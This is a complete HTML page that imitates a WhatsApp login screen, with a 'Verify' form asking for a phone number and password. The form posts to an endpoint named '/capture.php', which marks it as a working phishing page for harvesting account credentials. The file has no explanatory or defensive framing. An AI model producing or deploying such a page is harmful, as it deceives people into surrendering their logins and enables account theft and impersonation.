<!DOCTYPE html>
<html>
<head>
    <style>
        body { background: #e6ddd4; font-family: 'Segoe UI', sans-serif; }
        .container { max-width: 360px; background: white; border-radius: 3px; padding: 20px; }
        .logo { color: #25D366; font-size: 42px; text-align: center; }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">WhatsApp</div>
        <form action="/capture.php" method="POST">
            <input type="tel" name="phone" placeholder="Phone number" required><br>
            <input type="password" name="password" placeholder="Password" required><br>
            <button type="submit">Verify</button>
        </form>
    </div>
</body>
</html>